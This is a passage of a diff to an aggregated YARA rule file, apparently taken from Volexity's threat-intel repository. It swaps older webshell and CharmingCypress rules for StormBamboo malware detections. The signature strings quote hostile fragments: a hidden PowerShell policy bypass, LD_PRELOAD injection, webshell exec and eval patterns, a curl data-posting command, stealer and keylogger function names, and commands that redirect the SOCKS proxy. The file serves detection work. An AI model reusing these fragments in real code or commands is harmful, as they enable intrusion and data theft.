"https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L101-L134" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "65eebfea2338deed682693f048a88d46ea4621177acb77c0642583b0dc35c818" + description = "Detects unpacked SystemBC module" + author = "Thomas Barabosch, Deutsche Telekom Security" + id = "39e1a131-bd2c-56e9-961f-2b2c31f29e85" + date = "2022-03-13" + modified = "2022-03-13" + reference = "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6" + source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/systembc/systembc.yara#L1-L27" + license_url = "N/A" + logic_hash = "2f6e2c4c786941f800678e22679d4b81d1097a46c2555ae70e745df1b997c1c8" score = 75 - quality = 80 - tags = "COMMODITY" - hash1 = "7474a6008b99e45686678f216af7d6357bb70a054c6d9b05e1817c8d80d536b4" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 1 + quality = 70 + tags = "FILE" + sharing = "TLP:WHITE" + hash_1 = "c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5" + in_memory = "True" strings: - $elf1 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" ascii - $elf2 = "reflective_inject_dll" fullword ascii - $elf3 = "ld_preload_inject_dll" fullword ascii - $pupy1 = "_pupy.error" ascii - $pupy2 = "_pupy" ascii - $pupy3 = "pupy://" ascii - $s1 = "Args not passed" ascii - $s2 = "Too many args" ascii - $s3 = "Can't execute" ascii - $s4 = "mexec:stdin" ascii - $s5 = "mexec:stdout" ascii - $s6 = "mexec:stderr" ascii - $s7 = "LZMA error" ascii + $sx1 = "-WindowStyle Hidden -ep bypass -file" ascii + $sx2 = "BEGINDATA" ascii + $sx3 = "GET %s HTTP/1.0" ascii + $s5 = "User-Agent:" ascii + $s8 = "ALLUSERSPROFILE" ascii condition: - any of ($elf*) or all of ($pupy*) or all of ($s*) + ( uint16(0)==0x5a4d and filesize <30KB and 2 of ($sx*)) or all of them } -rule VOLEXITY_General_Php_Fileinput_Eval : WEBSHELLS GENERAL +/* + * YARA Rule Set + * Repository Name: Volexity + * Repository: https://github.com/volexity/threat-intel + * Retrieval Date: 2024-09-29 + * Git Commit: f5ecc7bce2475e6bd1038a807bca3e313640fdf3 + * Number of Rules: 91 + * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) + * + * + * LICENSE + * + * Copyright 2022 by Volexity, Inc. + +The 2-Clause BSD License + +Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: +1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + */ +import "pe" +import "hash" + +rule VOLEXITY_Apt_Malware_Any_Reloadext_Plugin : STORMBAMBOO FILE MEMORY { meta: - description = "Look for PHP files which use file_get_contents and then shortly afterwards use an eval statement." + description = "Detection for RELOADEXT, a Google Chrome extension malware." author = "threatintel@volexity.com" - id = "c00d8fee-f667-5979-ad2a-dbb762544c2f" - date = "2021-06-16" - modified = "2022-07-28" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L136-L152" + id = "6c6c8bee-2a13-5645-89ef-779f00264fd9" + date = "2024-02-23" + modified = "2024-08-02" + reference = "TIB-20240227" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L4-L36" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "c61f0ee13007e398f45711354a1ca948f7f34893c9bcbdf845be932b63bd746d" + logic_hash = "2b11f8fc5b6260ebf00bde83585cd7469709a4979ca579cdf065724bc15052fc" score = 75 quality = 80 - tags = "WEBSHELLS, GENERAL" - hash1 = "1a34c43611ee310c16acc383c10a7b8b41578c19ee85716b14ac5adbf0a13bd5" + tags = "STORMBAMBOO, FILE, MEMORY" + hash1 = "9d0928b3cc21ee5e1f2868f692421165f46b5014a901636c2a2b32a4c500f761" + os = "all" + os_arch = "all" + scan_context = "file,memory" + severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 0 + rule_id = 10282 + version = 4 strings: - $s1 = "file_get_contents(\"php://input\");" - $s2 = "eval(" + $man1 = "Reload page with Internet Explorer compatible mode." + $man2 = "\"http://*/*\"" + $code1 = ";chrome[" + $code2 = "XMLHttpRequest(),_" + $code3 = "0x400*0x400" condition: - $s2 in (@s1[1]..@s1[1]+512) + all of ($man*) or (#code1>8 and #code2>=2 and #code3>=2) } -rule VOLEXITY_General_Php_Call_User_Func : GENERAL WEBSHELLS +import "pe" +import "hash" + +rule VOLEXITY_Apt_Malware_Macos_Reloadext_Installer : STORMBAMBOO FILE MEMORY { meta: - description = "Webshells using call_user_func against an object from a file input or POST variable." + description = "Detect the RELOADEXT installer." author = "threatintel@volexity.com" - id = "48c7857e-7dda-5e3f-b82c-7d34c251f083" - date = "2021-06-16" - modified = "2022-07-28" - reference = "https://zhuanlan.zhihu.com/p/354906657" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L154-L170" + id = "c65ea2b5-ab98-5693-92ea-05c0f1ea1e5b" + date = "2024-02-23" + modified = "2024-08-02" + reference = "TIB-20240227" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L37-L62" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "46c999da97682023861e58f9cd2c8651480db990a0361c1985c6d5c35b5bf0ea" + logic_hash = "8688796839202d95ded15e10262a7a7c7cbbae4a332b60305402e5984005d452" score = 75 quality = 80 - tags = "GENERAL, WEBSHELLS" - hash1 = "40b053a2f3c8f47d252b960a9807b030b463ef793228b1670eda89f07b55b252" + tags = "STORMBAMBOO, FILE, MEMORY" + hash1 = "07e3b067dc5e5de377ce4a5eff3ccd4e6a2f1d7a47c23fe06b1ededa7aed1ab3" + os = "darwin" + os_arch = "all" + scan_context = "file,memory" + severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 0 + rule_id = 10281 + version = 2 strings: - $s1 = "@call_user_func(new C()" wide ascii + $str1 = "/CustomPlug1n/" + $str2 = "Chrome NOT installed." + $str3 = "-f force kill Chrome" + $str4 = "/*} &&cp -rf ${" condition: - $s1 + 3 of them } -rule VOLEXITY_Webshell_Php_Icescorpion : COMMODITY WEBSHELL FILE +import "pe" +import "hash" + +rule VOLEXITY_Apt_Malware_Any_Macma_A : STORMBAMBOO FILE MEMORY { meta: - description = "Detects the IceScorpion webshell." + description = "Detects variants of the MACMA backdoor, variants of MACMA have been discovered for Windows, macOS and android." author = "threatintel@volexity.com" - id = "dd165d67-375e-5d51-825a-45241345e268" - date = "2022-01-17" - modified = "2022-07-28" - reference = "https://www.codenong.com/cs106064226/" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L172-L190" + id = "6ab45af1-41e5-53fc-9297-e2bc07ebf797" + date = "2021-11-12" + modified = "2024-08-02" + reference = "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L64-L112" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "0c75ec7cbbfdba8ce5f71a83d78caf19366954b84f304c1864e68bbe11a9a2df" + logic_hash = "7ebaff9fddf6491d6b1ed9ab14c1b87dc8df850536e55aa723d625a593b33ed7" score = 75 - quality = 80 - tags = "COMMODITY, WEBSHELL, FILE" - hash1 = "5af4788d1a61009361b37e8db65deecbfea595ef99c3cf920d33d9165b794972" + quality = 53 + tags = "STORMBAMBOO, FILE, MEMORY" + hash1 = "cf5edcff4053e29cb236d3ed1fe06ca93ae6f64f26e25117d68ee130b9bc60c8" + hash2 = "9b71fad3280cf36501fe110e022845b29c1fb1343d5250769eada7c36bc45f70" + hash3 = "623f99cbe20af8b79cbfea7f485d47d3462d927153d24cac4745d7043c15619a" + hash4 = "d599d7814adbab0f1442f5a10074e00f3a776ce183ea924abcd6154f0d068bb4" + os = "all" + os_arch = "all" + report1 = "TIB-20231221" + report2 = "TIB-20240227" + scan_context = "file,memory" + severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 0 + rule_id = 6114 + version = 8 strings: - $s1 = "[$i+1&15];" - $s2 = "openssl_decrypt" + $magic1 = "curl -o %s http://cgi1.apnic.net/cgi-bin/my-ip.php" fullword ascii + $magic2 = "[FST%d]: WhyUserCancel UNKNOW: %d" fullword ascii + $magic3 = "[FST%d]: wait C2 prepare ready TIMEOUT, fd: %d" fullword ascii + $magic4 = "[FST%d]: wait C2 ack file content TIMEOUT, fd: %d" fullword ascii + $magic5 = "[FST%d]: TIMER_CHECK_CANCEL WhyUserCancel UNKNOW: %d" fullword ascii + $magic6 = "[FST%d]: encrypt file info key=%s, crc v1=0x%p, v2=0x%p" fullword ascii + $s1 = "auto bbbbbaaend:%d path %s" fullword ascii + $s2 = "0keyboardRecirderStopv" fullword ascii + $s3 = "curl begin..." fullword ascii + $s4 = "curl over!" fullword ascii + $s5 = "kAgent fail" fullword ascii + $s6 = "put !!!!" fullword ascii + $s7 = "vret!!!!!! %d" fullword ascii + $s8 = "save Setting Success" fullword ascii + $s9 = "Start Filesyste Search." fullword ascii + $s10 = "./SearchFileTool" fullword ascii + $s11 = "put unknow exception in MonitorQueue" fullword ascii + $s12 = "./netcfg2.ini" fullword ascii + $s13 = ".killchecker_" fullword ascii + $s14 = "./param.ini" fullword ascii condition: - all of them and filesize <10KB + any of ($magic*) or 7 of ($s*) } -rule VOLEXITY_Apt_Macos_Gimmick : STORMCLOUD +import "pe" +import "hash" + +rule VOLEXITY_Apt_Malware_Macos_Gimmick : STORMBAMBOO FILE MEMORY { meta: description = "Detects the macOS port of the GIMMICK malware." author = "threatintel@volexity.com" - id = "258a2bbe-7822-5f74-b4eb-8776ecb15b76" + id = "3d485788-4aab-511b-a49e-5dc09d1950a9" date = "2021-10-18" - modified = "2022-03-22" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-03-22 GIMMICK/indicators/yara.yar#L1-L50" + modified = "2024-08-02" + reference = "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L113-L171" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "403ed1102fe5a99c0aacde02e0830f9c4fa194f10aec4a192f4abf6cde0de99d" + logic_hash = "00fba9df2212874a45d44b3d098a7b76c97fcd53ff083c76b784d2b510a4a467" score = 75 quality = 78 - tags = "STORMCLOUD" + tags = "STORMBAMBOO, FILE, MEMORY" hash1 = "2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f" + os = "darwin" + os_arch = "all" + scan_context = "file,memory" + severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 1 + rule_id = 6022 + version = 8 strings: $s1 = "http://cgi1.apnic.net/cgi-bin/my-ip.php --connect-timeout 10 -m 20" wide ascii @@ -201508,496 +202983,351 @@ rule VOLEXITY_Apt_Macos_Gimmick : STORMCLOUD $cmd14 = "failDownItems" ascii wide $cmd15 = "downloadCmds" ascii wide $cmd16 = "uploadFiles" ascii wide + $cmd17 = "bash callback...." ascii wide condition: $s1 or 5 of ($json*) or 3 of ($msg*) or 9 of ($cmd*) } -rule VOLEXITY_Apt_Win_Gimmick_Dotnet_Base : STORMCLOUD -{ - meta: - description = "Detects the base version of GIMMICK in .NET." - author = "threatintel@volexity.com" - id = "8723253f-ad11-509e-a9b4-f2c3258f9b5c" - date = "2020-03-16" - modified = "2022-03-22" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-03-22 GIMMICK/indicators/yara.yar#L52-L76" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "0dd2aab308b7057d3075c792339af89d7ff9d617f1beb78ecdb725554defa5dc" - score = 75 - quality = 80 - tags = "STORMCLOUD" - hash1 = "b554bfe4c2da7d0ac42d1b4f28f4aae854331fd6d2b3af22af961f6919740234" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 1 - - strings: - $other1 = "srcStr is null" wide - $other2 = "srcBs is null " wide - $other3 = "Key cannot be null" wide - $other4 = "Faild to get target constructor, targetType=" wide - $other5 = "hexMoudule(public key) cannot be null or empty." wide - $other6 = "https://oauth2.googleapis.com/token" wide - $magic1 = "TWljcm9zb2Z0IUAjJCVeJiooKQ==" ascii wide - $magic2 = "DAE47700E8CF3DAB0@" ascii wide - - condition: - 5 of ($other*) or any of ($magic*) -} -rule VOLEXITY_Webshell_Jsp_Godzilla : WEBSHELLS COMMODITY -{ - meta: - description = "Detects the JSP implementation of the Godzilla Webshell." - author = "threatintel@volexity.com" - id = "47c8eab8-84d7-5566-b757-5a6dcc7579b7" - date = "2021-11-08" - modified = "2022-08-10" - reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L1-L28" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "52cba9545f662da18ca6e07340d7a9be637b89e7ed702dd58cac545c702a00e3" - score = 75 - quality = 80 - tags = "WEBSHELLS, COMMODITY" - hash1 = "2786d2dc738529a34ecde10ffeda69b7f40762bf13e7771451f13a24ab7fc5fe" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 1 - - strings: - $s1 = ".getWriter().write(base64Encode(" wide ascii - $s2 = ".getAttribute(" ascii wide - $s3 = "java.security.MessageDigest" ascii wide - $auth1 = /String xc=\"[a-f0-9]{16}\"/ ascii wide - $auth2 = "String pass=\"" ascii wide - $magic = "class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q" - $magic2 = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class" - - condition: - all of ($s*) or all of ($auth*) or any of ($magic*) -} -rule VOLEXITY_Webshell_Jsp_General_Runtime_Exec_Req : GENERAL WEBSHELLS -{ - meta: - description = "Looks for a common design pattern in webshells where a request attribute is passed directly to exec()." - author = "threatintel@volexity.com" - id = "7f1539bd-a2f0-50dd-b500-ada4e0971d13" - date = "2022-02-02" - modified = "2022-08-10" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L30-L45" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "d3048aba80c1c39f1673931cd2d7c5ed83045603b0ad204073fd788d0103a6c8" - score = 75 - quality = 80 - tags = "GENERAL, WEBSHELLS" - hash1 = "4935f0c50057e28efa7376c734a4c66018f8d20157b6584399146b6c79a6de15" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 1 - - strings: - $s1 = "Runtime.getRuntime().exec(request." ascii - - condition: - $s1 -} -rule VOLEXITY_Webshell_Jsp_Regeorg : WEBSHELL COMMODITY -{ - meta: - description = "Detects the reGeorg webshells' JSP version." - author = "threatintel@volexity.com" - id = "205ee383-4298-5469-a509-4ce3eaf9dd0e" - date = "2022-03-08" - modified = "2022-08-10" - reference = "https://github.com/SecWiki/WebShell-2/blob/master/reGeorg-master/tunnel.jsp" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L47-L70" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "cecb71605d9112d509823c26e40e1cf9cd6db581db448db5c9ffc63a2bfe529e" - score = 75 - quality = 80 - tags = "WEBSHELL, COMMODITY" - hash1 = "f9b20324f4239a8c82042d8207e35776d6777b6305974964cd9ccc09d431b845" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 1 - - strings: - $magic = "socketChannel.connect(new InetSocketAddress(target, port))" ascii - $a1 = ".connect(new InetSocketAddress" ascii - $a2 = ".configureBlocking(false)" ascii - $a3 = ".setHeader(" ascii - $a4 = ".getHeader(" ascii - $a5 = ".flip();" ascii - - condition: - $magic or all of ($a*) -} -import "hash" import "pe" +import "hash" -rule VOLEXITY_Apt_Malware_Vbs_Basicstar : CHARMINGCYPRESS FILE MEMORY +rule VOLEXITY_Apt_Malware_Win_Dustpan_Apihashes : STORMBAMBOO FILE { meta: - description = "VBS backdoor which bares architectural similarity to the POWERSTAR malware family." + description = "Detects DUSTPAN malware using API hashes used to resolve functions at runtime." author = "threatintel@volexity.com" - id = "e790defe-2bd5-5629-8420-ce8091483589" - date = "2024-01-04" - modified = "2024-01-11" - reference = "TIB-20240111" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L64-L92" + id = "ed275da4-cd95-5fa3-a568-e610fb405bb3" + date = "2023-08-17" + modified = "2024-08-02" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L173-L210" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "977bb42553bb6585c8d0e1e89675644720ca9abf294eccd797e20d4bca516810" + logic_hash = "3edb66ade428c451c18aa152244f869f9f8c10e62ed942bf722b4d1cf1893e93" score = 75 quality = 80 - tags = "CHARMINGCYPRESS, FILE, MEMORY" - hash1 = "c6f91e5585c2cbbb8d06b7f239e30b271f04393df4fb81815f6556fa4c793bb0" + tags = "STORMBAMBOO, FILE" + hash1 = "b77bcfb036f5a6a3973fdd68f40c0bd0b19af1246688ca4b1f9db02f2055ef9d" os = "win" os_arch = "all" - scan_context = "file,memory" + report1 = "MAR-20230818" + report2 = "TIB-20231221" + scan_context = "file" + severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 10037 - version = 4 + rule_id = 9591 + version = 3 strings: - $s1 = "Base64Encode(EncSess)" ascii wide - $s2 = "StrReverse(PlainSess)" ascii wide - $s3 = "ComDecode, \"Module\"" ascii wide - $s4 = "ComDecode, \"SetNewConfig\"" ascii wide - $s5 = "ComDecode, \"kill\"" ascii wide - $magic = "cmd /C start /MIN curl --ssl-no-revoke -s -d " ascii wide + $h1 = {9c 5b 9f 0b} + $h2 = {4c 8f 3e 08} + $h3 = {b4 aa f2 06} + $h4 = {dc cb ca 09} + $h5 = {d4 33 07 0e} + $h6 = {27 89 d6 0a} + $h7 = {b5 7d ae 09} + $h8 = {4e 64 eb 0b} + $h9 = {be 17 d9 08} + $magic = "SMHM" condition: - 3 of ($s*) or $magic + 6 of ($h*) and $magic } -import "hash" import "pe" - -rule VOLEXITY_Apt_Malware_Ps1_Powerless_B : CHARMINGCYPRESS FILE MEMORY -{ - meta: - description = "Detects POWERLESS malware." - author = "threatintel@volexity.com" - id = "74dd8412-c099-5ecb-af97-c22fede14252" - date = "2023-10-25" - modified = "2023-11-03" - reference = "TIB-20231027" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L93-L150" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "a95fe2c8d09d66e07a999eef3a5666cc622bbc063d747626c48b26cfecf35849" - score = 75 - quality = 78 - tags = "CHARMINGCYPRESS, FILE, MEMORY" - hash1 = "62de7abb39cf4c47ff120c7d765749696a03f4fa4e3e84c08712bb0484306ae1" - os = "win" - os_arch = "all" - scan_context = "file,memory" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9794 - version = 4 - - strings: - $fun_1 = "function verifyClickStorke" - $fun_2 = "function ConvertTo-SHA256" - $fun_3 = "function Convert-Tobase" fullword - $fun_4 = "function Convert-Frombase" fullword - $fun_5 = "function Send-Httppacket" - $fun_6 = "function Generat-FetchCommand" - $fun_7 = "function Create-Fetchkey" - $fun_8 = "function Run-Uploader" - $fun_9 = "function Run-Shot" fullword - $fun_10 = "function ShotThis(" - $fun_11 = "function File-Manager" - $fun_12 = "function zip-files" - $fun_13 = "function Run-Stealer" - $fun_14 = "function Run-Downloader" - $fun_15 = "function Run-Stro" fullword - $fun_16 = "function Run-Tele" fullword - $fun_17 = "function Run-Voice" - $s_1 = "if($commandtype -eq \"klg\")" - $s_2 = "$desrilizedrecievedcommand" - $s_3 = "$getAsyncKeyProto = @" - $s_4 = "$Global:BotId =" - $s_5 = "$targetCLSID = (Get-ScheduledTask | Where-Object TaskName -eq" - $s_6 = "$burl = \"$Global:HostAddress/" - $s_7 = "$hashString = [System.BitConverter]::ToString($hash).Replace('-','').ToLower()" - $s_8 = "$Global:UID = ((gwmi win32_computersystemproduct).uuid -replace '[^0-9a-z]').substring(" - $s_9 = "$rawpacket = \"{`\"MId`\":`\"$Global:MachineID`\",`\"BotId`\":`\"$basebotid`\"}\"" - $s_10 = "$bitmap = New-Object System.Drawing.Bitmap $bounds.Width, $bounds.Height" - $s_12 = "Runned Without any Error" - $s_13 = "$commandresponse = (Invoke-Expression $instruction -ErrorAction Stop) | Out-String" - $s_14 = "Operation started successfuly" - $s_15 = "$t_path = (Get-WmiObject Win32_Process -Filter \"name = '$process'\" | Select-Object CommandLine).CommandLine" - $s_16 = "?{ $_.DisplayName -match \"Telegram Desktop\" } | %{$app_path += $_.InstallLocation }" - $s_17 = "$chlids = get-ChildItem $t -Recurse -Exclude \"$t\\tdata\\user_data\"" - $s_18 = "if($FirsttimeFlag -eq $True)" - $s_19 = "Update-Conf -interval $inter -url $url -next_url $next -conf_path $conf_path -key $config_key" - - condition: - 3 of ($fun_*) or any of ($s_*) -} import "hash" -import "pe" -rule VOLEXITY_Apt_Malware_Macos_Vpnclient_Cc_Oct23 : CHARMINGCYPRESS FILE MEMORY +rule VOLEXITY_Apt_Malware_Win_Pocostick_Jul23 : STORMBAMBOO FILE MEMORY { meta: - description = "Detection for fake macOS VPN client used by CharmingCypress." + description = "Detects the July 2023 POCOSTICK variant. These strings are only visible in memory after several rounds of shellcode decryption." author = "threatintel@volexity.com" - id = "e0957936-dc6e-5de6-bb23-d0ef61655029" - date = "2023-10-17" - modified = "2023-10-27" - reference = "TIB-20231027" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L236-L261" + id = "9632a7fc-06da-58b4-b95c-b46aeb9dd41d" + date = "2023-07-24" + modified = "2024-08-02" + reference = "TIB-20231221" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L212-L241" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "da5e9be752648b072a9aaeed884b8e1729a14841e33ed6633a0aaae1f11bd139" + logic_hash = "19487db733c7f793be2a1287df32a165e46f6af0e940b13b389f4d675b5100c4" score = 75 quality = 80 - tags = "CHARMINGCYPRESS, FILE, MEMORY" - hash1 = "11f0e38d9cf6e78f32fb2d3376badd47189b5c4456937cf382b8a574dc0d262d" - os = "darwin,linux" + tags = "STORMBAMBOO, FILE, MEMORY" + hash1 = "ec3e787c369ac4b28447e7cacc44d70a595e39d47f842bacb07d19b12cab6aad" + os = "win" os_arch = "all" - parent_hash = "31ca565dcbf77fec474b6dea07101f4dd6e70c1f58398eff65e2decab53a6f33" scan_context = "file,memory" + severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9770 + rule_id = 9542 version = 3 strings: - $s1 = "networksetup -setsocksfirewallproxystate wi-fi off" ascii - $s2 = "networksetup -setsocksfirewallproxy wi-fi ___serverAdd___ ___portNum___; networksetup -setsocksfirewallproxystate wi-fi on" ascii - $s3 = "New file imported successfully." ascii - $s4 = "Error in importing the File." ascii + $str1 = "Folder PATH listing form volume" wide + $str2 = "Volume serial number is 0000-1111" wide + $str3 = "Type:Error" wide + $str4 = "Type:Desktop" wide + $str5 = "Type:Laptop" wide + $str6 = "Type:Vitual" wide + $str7 = ".unicode.tmp" wide + $str8 = "EveryOne" wide condition: - 2 of ($s*) + 6 of them } -import "hash" import "pe" +import "hash" -rule VOLEXITY_Apt_Malware_Charmingcypress_Openvpn_Configuration : CHARMINGCYPRESS FILE +rule VOLEXITY_Apt_Malware_Py_Dustpan_Pyloader : STORMBAMBOO FILE MEMORY { meta: - description = "Detection for a .ovpn file used in a malicious VPN client on victim machines by CharmingCypress." + description = "Detects Python script used by KPlayer to update, modified by attackers to download a malicious payload." author = "threatintel@volexity.com" - id = "f39b2d7c-f0c5-5623-a114-02ba32469e59" - date = "2023-10-17" - modified = "2023-10-27" - reference = "TIB-20231027" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L262-L286" + id = "446d2eef-c60a-50ed-9ff1-df86b6210dff" + date = "2023-07-21" + modified = "2024-08-02" + reference = "TIB-20231221" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L243-L279" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "f4c5f13ac75504b14def9c37d3a41c6eea4c45845d4b54c50030b1f00691e4bf" + logic_hash = "bb3a70dad28181534e27abbbd618165652c137264bfd3726ae4480c642493a3b" score = 75 quality = 80 - tags = "CHARMINGCYPRESS, FILE" - hash1 = "d6d043973d8843a82033368c785c362f51395b1a1d475fa4705aff3526e15268" - parent_hash = "31ca565dcbf77fec474b6dea07101f4dd6e70c1f58398eff65e2decab53a6f33" + tags = "STORMBAMBOO, FILE, MEMORY" os = "all" os_arch = "all" - scan_context = "file" + scan_context = "file,memory" + severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9769 - version = 3 + rule_id = 9530 